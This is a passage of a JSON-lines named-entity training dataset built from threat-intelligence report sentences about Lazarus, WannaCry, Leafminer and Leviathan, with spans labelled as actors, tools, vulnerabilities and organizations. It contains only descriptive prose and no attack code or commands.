[[57, 65]]}, "info": {"id": "dnrti_train_000612", "source": "dnrti_train"}} {"text": "This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[42, 54]]}, "info": {"id": "dnrti_train_000613", "source": "dnrti_train"}} {"text": "The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": {"VULNERABILITY: CVE-2018-4878": [[39, 52]], "THREAT_ACTOR: attacker": [[65, 73]]}, "info": {"id": "dnrti_train_000614", "source": "dnrti_train"}} {"text": "These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system .", "spans": {"TOOL: Bankshot": [[50, 58]], "THREAT_ACTOR: attacker": [[96, 104]]}, "info": {"id": "dnrti_train_000615", "source": "dnrti_train"}} {"text": "Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants .", "spans": {"TOOL: Bankshot": [[0, 8]], "ORGANIZATION: Department of Homeland Security": [[35, 66]]}, "info": {"id": "dnrti_train_000616", "source": "dnrti_train"}} {"text": "We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) .", "spans": {"ORGANIZATION: financial organizations": [[88, 111]]}, "info": {"id": "dnrti_train_000617", "source": "dnrti_train"}} {"text": "This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: 32-bit Windows executable file": [[45, 75]], "TOOL: Remote Access Trojan": [[94, 114]], "TOOL: RAT": [[117, 120]]}, "info": {"id": "dnrti_train_000619", "source": "dnrti_train"}} {"text": "This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , 
capturing screen shots , and exfiltrating data .", "spans": {}, "info": {"id": "dnrti_train_000620", "source": "dnrti_train"}} {"text": "Volgmer is a backdoor Trojan designed to provide covert access to a compromised system .", "spans": {"TOOL: Volgmer": [[0, 7]], "TOOL: backdoor Trojan": [[13, 28]]}, "info": {"id": "dnrti_train_000621", "source": "dnrti_train"}} {"text": "It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system .", "spans": {"TOOL: Volgmer": [[74, 81]], "THREAT_ACTOR: HIDDEN COBRA actors": [[105, 124]], "TOOL: custom tools": [[140, 152]]}, "info": {"id": "dnrti_train_000622", "source": "dnrti_train"}} {"text": "Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[22, 41]], "TOOL: Volgmer malware": [[67, 82]]}, "info": {"id": "dnrti_train_000623", "source": "dnrti_train"}} {"text": "As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories .", "spans": {"TOOL: backdoor Trojan": [[5, 20]], "TOOL: Volgmer": [[23, 30]]}, "info": {"id": "dnrti_train_000625", "source": "dnrti_train"}} {"text": "In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": {"ORGANIZATION: US-CERT Code Analysis Team": [[50, 76]], "MALWARE: botnet controller": [[86, 103]]}, "info": {"id": "dnrti_train_000626", "source": "dnrti_train"}} {"text": "Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": {"TOOL: Volgmer": [[0, 7]], "MALWARE: .dll": 
[[99, 103]]}, "info": {"id": "dnrti_train_000627", "source": "dnrti_train"}} {"text": "Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service .", "spans": {"THREAT_ACTOR: Lazarus actors": [[0, 14]]}, "info": {"id": "dnrti_train_000628", "source": "dnrti_train"}} {"text": "Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL .", "spans": {"ORGANIZATION: U.S. Government": [[13, 28], [144, 159]], "ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "TOOL: Trojan malware": [[63, 77]]}, "info": {"id": "dnrti_train_000629", "source": "dnrti_train"}} {"text": "The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP port 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications .", "spans": {"TOOL: custom binary protocol": [[19, 41]], "TOOL: beacon": [[45, 51]], "TOOL: Secure Socket Layer": [[166, 185]], "TOOL: SSL": [[188, 191]]}, "info": {"id": "dnrti_train_000630", "source": "dnrti_train"}} {"text": "DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]]}, "info": {"id": "dnrti_train_000631", "source": "dnrti_train"}} {"text": "The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal .", "spans": {"TOOL: RATANKBA": [[21, 29]], "THREAT_ACTOR: Lazarus": [[60, 67]]}, "info": {"id": "dnrti_train_000632", "source": "dnrti_train"}} {"text": "We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL–A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified .", "spans": {"TOOL: RATANKBA": [[18, 26]], 
"TOOL: BKDR_RATANKBA.ZAEL–A": [[37, 57]], "TOOL: PowerShell script": [[100, 117]]}, "info": {"id": "dnrti_train_000633", "source": "dnrti_train"}} {"text": "Around 55% of the victims of Lazarus were located in India and neighboring countries .", "spans": {"THREAT_ACTOR: Lazarus": [[29, 36]]}, "info": {"id": "dnrti_train_000634", "source": "dnrti_train"}} {"text": "Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks .", "spans": {"THREAT_ACTOR: Lazarus group": [[0, 13]], "ORGANIZATION: financial institutions": [[95, 117]]}, "info": {"id": "dnrti_train_000635", "source": "dnrti_train"}} {"text": "Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks—such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank—in recent history .", "spans": {"THREAT_ACTOR: threat actors": [[122, 135]]}, "info": {"id": "dnrti_train_000636", "source": "dnrti_train"}} {"text": "It 's possible that Lazarus is using RATANKBA to target larger organizations .", "spans": {"THREAT_ACTOR: Lazarus": [[20, 27]], "TOOL: RATANKBA": [[37, 45]]}, "info": {"id": "dnrti_train_000637", "source": "dnrti_train"}} {"text": "RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders .", "spans": {"TOOL: RATANKBA": [[0, 8]], "TOOL: Microsoft Office documents": [[83, 109]], "TOOL: CHM files": [[122, 131]]}, "info": {"id": "dnrti_train_000638", "source": "dnrti_train"}} {"text": "Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses .", "spans": {"THREAT_ACTOR: 
Lazarus": [[74, 81]], "THREAT_ACTOR: groups": [[100, 106]], "THREAT_ACTOR: cybercriminals": [[123, 137]]}, "info": {"id": "dnrti_train_000639", "source": "dnrti_train"}} {"text": "simultaneous use of the detected Win32/KillDisk.NBO variants .", "spans": {"TOOL: Win32/KillDisk.NBO": [[33, 51]]}, "info": {"id": "dnrti_train_000640", "source": "dnrti_train"}} {"text": "Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN .", "spans": {"ORGANIZATION: U.S. Government": [[13, 28]], "ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "TOOL: Trojan malware": [[63, 77]], "TOOL: HARDRAIN": [[143, 151]]}, "info": {"id": "dnrti_train_000641", "source": "dnrti_train"}} {"text": "These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections .", "spans": {"TOOL: RATs": [[108, 112]]}, "info": {"id": "dnrti_train_000642", "source": "dnrti_train"}} {"text": "The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America .", "spans": {"THREAT_ACTOR: cybercriminal group": [[4, 23]], "THREAT_ACTOR: Lazarus": [[24, 31]], "ORGANIZATION: financial organizations": [[59, 82]]}, "info": {"id": "dnrti_train_000643", "source": "dnrti_train"}} {"text": "We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America .", "spans": {"THREAT_ACTOR: Lazarus": [[33, 40]], "ORGANIZATION: Trend Micro": [[91, 102]], "TOOL: BKDR_BINLODR.ZNFJ-A": [[106, 125]], "ORGANIZATION: financial institutions": [[153, 175]]}, "info": {"id": "dnrti_train_000644", "source": "dnrti_train"}} {"text": "We determined that these backdoors 
were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component .", "spans": {}, "info": {"id": "dnrti_train_000645", "source": "dnrti_train"}} {"text": "Just last week Lazarus were found stealing millions from ATMs across Asia and Africa .", "spans": {"THREAT_ACTOR: Lazarus": [[15, 22]]}, "info": {"id": "dnrti_train_000646", "source": "dnrti_train"}} {"text": "These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization .", "spans": {"THREAT_ACTOR: Lazarus group": [[34, 47]]}, "info": {"id": "dnrti_train_000647", "source": "dnrti_train"}} {"text": "The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more .", "spans": {"THREAT_ACTOR: Lazarus": [[14, 21]], "THREAT_ACTOR: attackers": [[139, 148]]}, "info": {"id": "dnrti_train_000648", "source": "dnrti_train"}} {"text": "Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[39, 75]], "ORGANIZATION: Worry-Free™ Business Security": [[80, 109]], "MALWARE: malicious files": [[175, 190]]}, "info": {"id": "dnrti_train_000649", "source": "dnrti_train"}} {"text": "FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation .", "spans": {"ORGANIZATION: FBI": [[0, 3]], "THREAT_ACTOR: HIDDEN COBRA actors": [[29, 48]]}, "info": {"id": 
"dnrti_train_000650", "source": "dnrti_train"}} {"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": {"TOOL: WannaCry": [[42, 50]], "TOOL: WCry": [[57, 61]], "TOOL: WanaCrypt0r": [[69, 80]]}, "info": {"id": "dnrti_train_000651", "source": "dnrti_train"}} {"text": "We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia .", "spans": {"ORGANIZATION: BAE Systems": [[109, 120]]}, "info": {"id": "dnrti_train_000653", "source": "dnrti_train"}} {"text": "WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": {"TOOL: WannaCry": [[0, 8]], "VULNERABILITY: EternalBlue": [[18, 29]], "TOOL: SMB": [[51, 54]]}, "info": {"id": "dnrti_train_000654", "source": "dnrti_train"}} {"text": "WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 .", "spans": {"TOOL: WannaCry": [[0, 8]], "TOOL: WCry": [[25, 29]], "TOOL: WanaCryptor": [[33, 44]], "TOOL: ransomware": [[91, 101]], "ORGANIZATION: Microsoft": [[203, 212]], "TOOL: Server Message Block": [[216, 236]], "TOOL: SMB": [[239, 242]]}, "info": {"id": "dnrti_train_000656", "source": "dnrti_train"}} {"text": "The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities .", "spans": 
{"TOOL: WannaCry malware": [[4, 20]], "TOOL: SMB": [[180, 183]]}, "info": {"id": "dnrti_train_000657", "source": "dnrti_train"}} {"text": "WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"TOOL: WannaCry": [[0, 8]], "VULNERABILITY: EternalBlue": [[44, 55]], "THREAT_ACTOR: Shadow Brokers": [[85, 99]]}, "info": {"id": "dnrti_train_000658", "source": "dnrti_train"}} {"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": {"TOOL: WannaCry": [[0, 8]], "MALWARE: .WCRY": [[47, 52]]}, "info": {"id": "dnrti_train_000659", "source": "dnrti_train"}} {"text": "In May 2017 , SecureWorks® Counter Threat Unit® ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit®": [[14, 47]], "ORGANIZATION: CTU": [[50, 53]], "TOOL: WCry": [[112, 116]]}, "info": {"id": "dnrti_train_000660", "source": "dnrti_train"}} {"text": "In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[19, 50]], "ORGANIZATION: CTU": [[53, 56]]}, "info": {"id": "dnrti_train_000661", "source": "dnrti_train"}} {"text": "Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "VULNERABILITY: SMBv1 vulnerabilities": [[24, 45]]}, "info": {"id": "dnrti_train_000662", "source": "dnrti_train"}} {"text": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": 
{"VULNERABILITY: SMBv1 exploit": [[22, 35]], "THREAT_ACTOR: Shadow Brokers": [[79, 93]], "THREAT_ACTOR: threat group": [[94, 106]]}, "info": {"id": "dnrti_train_000663", "source": "dnrti_train"}} {"text": "If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": {"TOOL: DoublePulsar backdoor": [[7, 28]], "TOOL: SMB worm": [[55, 63]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[108, 133]]}, "info": {"id": "dnrti_train_000664", "source": "dnrti_train"}} {"text": "WCry uses a combination of the RSA and AES algorithms to encrypt files .", "spans": {"TOOL: WCry": [[0, 4]], "TOOL: RSA": [[31, 34]], "TOOL: AES": [[39, 42]]}, "info": {"id": "dnrti_train_000665", "source": "dnrti_train"}} {"text": "The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence .", "spans": {"TOOL: SMB worm": [[26, 34]], "TOOL: WCry": [[49, 53]]}, "info": {"id": "dnrti_train_000666", "source": "dnrti_train"}} {"text": "Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group .", "spans": {"ORGANIZATION: Microsoft": [[10, 19]], "ORGANIZATION: Facebook": [[44, 52]], "ORGANIZATION: security community": [[71, 89]], "THREAT_ACTOR: threat actor": [[199, 211]], "THREAT_ACTOR: ZINC": [[227, 231]], "THREAT_ACTOR: Lazarus Group": [[252, 265]]}, "info": {"id": "dnrti_train_000667", "source": "dnrti_train"}} {"text": "Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group .", "spans": {"ORGANIZATION: Microsoft": [[10, 19]], "ORGANIZATION: Facebook": [[44, 52]], "THREAT_ACTOR: Lazarus Group": [[143, 156]]}, "info": {"id": "dnrti_train_000668", "source": "dnrti_train"}} 
{"text": "We concluded that Lazarus Group was responsible for WannaCry , a destructive malware .", "spans": {"THREAT_ACTOR: Lazarus Group": [[18, 31]], "TOOL: WannaCry": [[52, 60]]}, "info": {"id": "dnrti_train_000669", "source": "dnrti_train"}} {"text": "We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"THREAT_ACTOR: Lazarus Group": [[18, 31]], "TOOL: WannaCry": [[52, 60]], "ORGANIZATION: Microsoft customers": [[105, 124]]}, "info": {"id": "dnrti_train_000670", "source": "dnrti_train"}} {"text": "Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus .", "spans": {"THREAT_ACTOR: ZINC/Lazarus": [[198, 210]]}, "info": {"id": "dnrti_train_000671", "source": "dnrti_train"}} {"text": "In November 2017 , Secureworks Counter Threat Unit™ ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"ORGANIZATION: Secureworks Counter Threat Unit™": [[19, 51]], "ORGANIZATION: CTU": [[54, 57]], "THREAT_ACTOR: cyber threat group": [[100, 118]], "THREAT_ACTOR: Lazarus Group": [[130, 143]], "THREAT_ACTOR: NICKEL ACADEMY": [[170, 184]], "ORGANIZATION: Secureworks": [[188, 199]], "ORGANIZATION: cryptocurrency company": [[319, 341]]}, "info": {"id": "dnrti_train_000672", "source": "dnrti_train"}} {"text": "In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"ORGANIZATION: CTU": [[19, 22]], 
"THREAT_ACTOR: cyber threat group": [[63, 81]], "THREAT_ACTOR: Lazarus Group": [[93, 106]], "ORGANIZATION: cryptocurrency company": [[226, 248]]}, "info": {"id": "dnrti_train_000673", "source": "dnrti_train"}} {"text": "Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations .", "spans": {"TOOL: Bankshot": [[0, 8]], "ORGANIZATION: Advanced Threat Research": [[91, 115]], "ORGANIZATION: financial organizations": [[184, 207]]}, "info": {"id": "dnrti_train_000674", "source": "dnrti_train"}} {"text": "CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "dnrti_train_000675", "source": "dnrti_train"}} {"text": "CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: NICKEL ACADEMY": [[30, 44]], "THREAT_ACTOR: Lazarus": [[47, 54]]}, "info": {"id": "dnrti_train_000676", "source": "dnrti_train"}} {"text": "There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign .", "spans": {"ORGANIZATION: CTU": [[46, 49]], "THREAT_ACTOR: NICKEL ACADEMY": [[99, 113]]}, "info": {"id": "dnrti_train_000677", "source": "dnrti_train"}} {"text": "CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: custom C2 protocol": [[50, 68]], "THREAT_ACTOR: Nickel Academy": [[113, 127]], "THREAT_ACTOR: Lazarus": [[130, 137]]}, "info": {"id": "dnrti_train_000678", "source": "dnrti_train"}} {"text": "CTU researchers also 
identified components in the custom C2 protocol being used ( the way in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: custom C2 protocol": [[50, 68]], "THREAT_ACTOR: Nickel Academy": [[187, 201]], "THREAT_ACTOR: Lazarus": [[204, 211]]}, "info": {"id": "dnrti_train_000679", "source": "dnrti_train"}} {"text": "The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group .", "spans": {"TOOL: RAT": [[90, 93]], "THREAT_ACTOR: NICKEL ACADEMY": [[147, 161]], "THREAT_ACTOR: Lazarus": [[164, 171]], "THREAT_ACTOR: threat group": [[174, 186]]}, "info": {"id": "dnrti_train_000681", "source": "dnrti_train"}} {"text": "During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and exfiltration .", "spans": {"THREAT_ACTOR: Leafminer": [[82, 91]], "THREAT_ACTOR: group": [[191, 196]]}, "info": {"id": "dnrti_train_000682", "source": "dnrti_train"}} {"text": "As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer .", "spans": {"TOOL: public web shell": [[103, 119]], "THREAT_ACTOR: Leafminer": [[135, 144]]}, "info": {"id": "dnrti_train_000683", "source": "dnrti_train"}} {"text": "As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers .", "spans": {"TOOL: public web shell": [[103, 119]], "THREAT_ACTOR: attackers": [[135, 144]]}, "info": {"id": "dnrti_train_000684", "source": "dnrti_train"}} {"text": "The Leafminer 's post-compromise toolkit suggests that Leafminer is 
looking for email data , files , and database servers on compromised target systems .", "spans": {"THREAT_ACTOR: Leafminer": [[4, 13], [55, 64]]}, "info": {"id": "dnrti_train_000685", "source": "dnrti_train"}} {"text": "Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army .", "spans": {"THREAT_ACTOR: hacker": [[16, 22]], "THREAT_ACTOR: Ashiyane": [[92, 100]], "THREAT_ACTOR: hacker group": [[139, 151]], "THREAT_ACTOR: Sun Army": [[152, 160]]}, "info": {"id": "dnrti_train_000686", "source": "dnrti_train"}} {"text": "Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan .", "spans": {"THREAT_ACTOR: Leafminer": [[41, 50]]}, "info": {"id": "dnrti_train_000687", "source": "dnrti_train"}} {"text": "Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East .", "spans": {"THREAT_ACTOR: Leafminer": [[21, 30]], "TOOL: JavaScript code": [[61, 76]], "TOOL: compromised websites": [[88, 108]]}, "info": {"id": "dnrti_train_000688", "source": "dnrti_train"}} {"text": "This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 .", "spans": {"TOOL: Fuzzbunch": [[18, 27]], "THREAT_ACTOR: Shadow Brokers": [[101, 115]]}, "info": {"id": "dnrti_train_000689", "source": "dnrti_train"}} {"text": "Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "VULNERABILITY: SMB vulnerabilities": [[124, 143]], "ORGANIZATION: Microsoft": [[157, 166]]}, "info": {"id": "dnrti_train_000690", "source": "dnrti_train"}} {"text": "The EternalBlue exploit from the framework received worldwide attention 
after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"VULNERABILITY: EternalBlue exploit": [[4, 23]], "TOOL: Petya": [[137, 142]], "TOOL: NotPetya": [[145, 153]]}, "info": {"id": "dnrti_train_000691", "source": "dnrti_train"}} {"text": "The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": {"THREAT_ACTOR: Leafminer": [[4, 13]], "THREAT_ACTOR: operators": [[14, 23]], "VULNERABILITY: EternalBlue": [[28, 39]]}, "info": {"id": "dnrti_train_000692", "source": "dnrti_train"}} {"text": "Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Leafminer": [[35, 44]], "VULNERABILITY: Heartbleed vulnerability": [[61, 85]], "VULNERABILITY: CVE-2014-0160": [[88, 101]]}, "info": {"id": "dnrti_train_000693", "source": "dnrti_train"}} {"text": "Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability .", "spans": {"THREAT_ACTOR: Leafminer": [[18, 27]], "TOOL: Python script": [[52, 65]]}, "info": {"id": "dnrti_train_000694", "source": "dnrti_train"}} {"text": "Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system .", "spans": {"THREAT_ACTOR: Leafminer": [[35, 44]], "TOOL: hacktools": [[160, 169]]}, "info": {"id": "dnrti_train_000695", "source": "dnrti_train"}} {"text": "Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia .", "spans": {"TOOL: THC Hydra": 
[[92, 101]], "THREAT_ACTOR: Leafminer": [[105, 114]]}, "info": {"id": "dnrti_train_000696", "source": "dnrti_train"}} {"text": "Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Leafminer group": [[62, 77]], "TOOL: Trojan.Imecab": [[80, 93]], "TOOL: Backdoor.Sorgu": [[98, 112]]}, "info": {"id": "dnrti_train_000697", "source": "dnrti_train"}} {"text": "Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "THREAT_ACTOR: group": [[29, 34]]}, "info": {"id": "dnrti_train_000698", "source": "dnrti_train"}} {"text": "Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "THREAT_ACTOR: threat actors": [[135, 148]]}, "info": {"id": "dnrti_train_000699", "source": "dnrti_train"}} {"text": "Dragos has identified Leafminer group targeting access operations in the electric utility sector .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: Leafminer group": [[22, 37]], "ORGANIZATION: electric utility sector": [[73, 96]]}, "info": {"id": "dnrti_train_000701", "source": "dnrti_train"}} {"text": "Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 .", "spans": {"THREAT_ACTOR: RASPITE": [[12, 19]], "THREAT_ACTOR: group": [[80, 85]]}, "info": {"id": "dnrti_train_000702", "source": "dnrti_train"}} {"text": "RASPITE targeting includes entities in the US , Middle East , Europe , and East Asia .", "spans": {"THREAT_ACTOR: RASPITE": [[0, 7]]}, "info": {"id": "dnrti_train_000703", "source": "dnrti_train"}} {"text": "RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the 
group 's activity in the Middle East .", "spans": {"THREAT_ACTOR: RASPITE": [[0, 7]], "ORGANIZATION: Symantec": [[36, 44]], "THREAT_ACTOR: Leafminer": [[48, 57]], "THREAT_ACTOR: group": [[100, 105]]}, "info": {"id": "dnrti_train_000704", "source": "dnrti_train"}} {"text": "RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector .", "spans": {"THREAT_ACTOR: RASPITE": [[0, 7]], "ORGANIZATION: electric utility sector": [[86, 109]]}, "info": {"id": "dnrti_train_000705", "source": "dnrti_train"}} {"text": "This means that the Leafminer group is targeting electric utilities .", "spans": {"THREAT_ACTOR: Leafminer group": [[20, 35]], "ORGANIZATION: electric utilities": [[49, 67]]}, "info": {"id": "dnrti_train_000706", "source": "dnrti_train"}} {"text": "While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events .", "spans": {"THREAT_ACTOR: group": [[10, 15]], "TOOL: ICS": [[44, 47], [245, 248]], "THREAT_ACTOR: RASPITE": [[61, 68]]}, "info": {"id": "dnrti_train_000707", "source": "dnrti_train"}} {"text": "Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"THREAT_ACTOR: actor": [[34, 39]], "ORGANIZATION: naval defense contractors": [[92, 117]], "ORGANIZATION: research institutions": [[135, 156]]}, "info": {"id": "dnrti_train_000708", "source": "dnrti_train"}} {"text": "Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"THREAT_ACTOR: Leviathan": [[33, 42]], "ORGANIZATION: naval defense contractors": [[95, 
120]], "ORGANIZATION: research institutions": [[138, 159]]}, "info": {"id": "dnrti_train_000709", "source": "dnrti_train"}} {"text": "The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": {"VULNERABILITY: CVE-2017-8759": [[26, 39]]}, "info": {"id": "dnrti_train_000711", "source": "dnrti_train"}} {"text": "The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": {"THREAT_ACTOR: Leviathan": [[4, 13]], "MALWARE: macro-laden Microsoft Word documents": [[37, 73]], "ORGANIZATION: development organizations": [[106, 131]]}, "info": {"id": "dnrti_train_000715", "source": "dnrti_train"}} {"text": "The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor .", "spans": {"ORGANIZATION: Proofpoint": [[95, 105]], "THREAT_ACTOR: actor": [[156, 161]]}, "info": {"id": 